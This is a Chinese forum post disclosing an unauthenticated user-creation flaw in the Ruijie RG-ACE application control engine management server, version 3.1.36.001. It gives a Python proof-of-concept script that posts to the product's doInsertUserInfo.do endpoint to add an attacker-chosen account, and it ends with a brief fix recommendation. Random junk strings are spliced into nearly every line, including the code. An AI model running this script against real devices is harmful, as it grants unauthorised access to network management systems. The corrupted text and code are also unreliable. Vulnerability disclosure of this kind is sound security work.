找回密码
 立即注册
查看: 2966|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
0 I# Z2 c& M" H
+ H: D( S" h4 `9 r; U& {1 U! T) g$ @+ P9 ^
测试的具体版本是
0 D" {  o4 Y8 z0 u' W% T  d产品名称: 锐捷应用控制引擎
3 }/ J1 {5 L5 J, j' ?0 |- Z( J版本号: 3.1.36.001 TC. |" S, W+ g+ O% Z% P, k
编译时间: 201104291730
2 H6 `/ [8 Z6 K/ S; a3 J / Y4 b4 K  ?0 e1 Y6 i3 v8 V# G
. H  ~" N9 h- B
漏洞证明:. `& S4 a9 v' u* n
# B/ R1 I) z7 g; M9 N- ?
* M) W2 M4 @8 l3 |" f' d0 I; \  X
- C6 ]. y/ J" I, Q  q
  K. J8 g7 n6 D. o
% H, C1 L5 X7 Z4 n$ M' c

# j, t, Q( Z2 Q! t) W4 T执行脚本4 X6 D$ X* z3 `% t/ k8 k; F
#! /usr/bin/env python
9 b9 i( k* e/ o8 m2 H% ^#coding=gbk: ?9 |- ~) ?5 h! a+ s4 L7 Y
#RG-ACE管理服务器 V3.1.36.001( ~  r$ W' q6 R3 z: p5 g# ^1 d. @
import urllib2, urllib,cookielib
( U$ V* M! X1 P( f+ {url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP* n; G$ _9 v3 Q) [
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
8 F/ j3 p! c# }& i8 lopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
0 u; P8 s/ M2 h: z2 m  z+ o1 z5 npost=(("event","userManager.doInsertUserInfo"),& K  I, \/ o# ]0 `" q  r  M
("useractionname","addButtonValue"),
' y% R1 q# Z+ e8 E9 S("useropermanager","userManager"),5 z" f" ~; o9 Q1 I: O! L2 b6 p* }- w
("userName","t"), #######账号自己加
  |* `0 R! y: m3 L# e("pwd","aaaaaa"),######密码自己加
' R+ m7 A' i6 }* ^8 X("trueName","ad"),
( w' U# [7 M& k  `9 l- M" j. ~' N' d3 V("email",""),
: z. m) a% R' Z+ a/ d("mobilePhone",""),* f  B3 V9 O, a) ~2 s+ m9 S
("officePhone",""),+ P/ M) U' X6 ?% P$ |& f
("addr",""),
3 h/ [. T; {" M, r: h# A! U("submit","确定"))
$ T6 d; `( k3 |3 Vurllib2.install_opener(opener)" ^0 t" }$ \8 l& G7 S0 U) g
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
- ^, Y" b1 _$ `+ ?4 Cprint "Done"6 C" U' K, L' W; g6 _

+ G9 q+ o0 R: }# l* Z$ ?1 Y1 n登录,连接设备; P7 J) H5 v# w7 K0 ~8 H7 k
4 T9 M3 i* t; E% E* X, D- f

1 l2 f& \5 l0 w# f
, i. U+ h& E2 R* w$ v, A6 u) L0 X  B# o% D" F5 ?0 f2 v

; I% Z! Q0 `; b/ Z: |# v. L默认的管理员admin权限更大点% \' J- y2 G, S: o. l! X( N, n3 ?
3 P* ]/ I0 r' J3 Z
/ I7 l9 F4 j% l5 A

' @4 H: L. H+ g9 F' B4 D* E " ?: X# r& j1 e; R! t- k
7 x9 i4 D! f. X& O
修复方案:
, X# ^( V. ]" s加强对接口的权限验证9 X1 P2 X0 m9 D9 S8 d$ k4 S( ]
) L6 m" o/ j1 T; a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表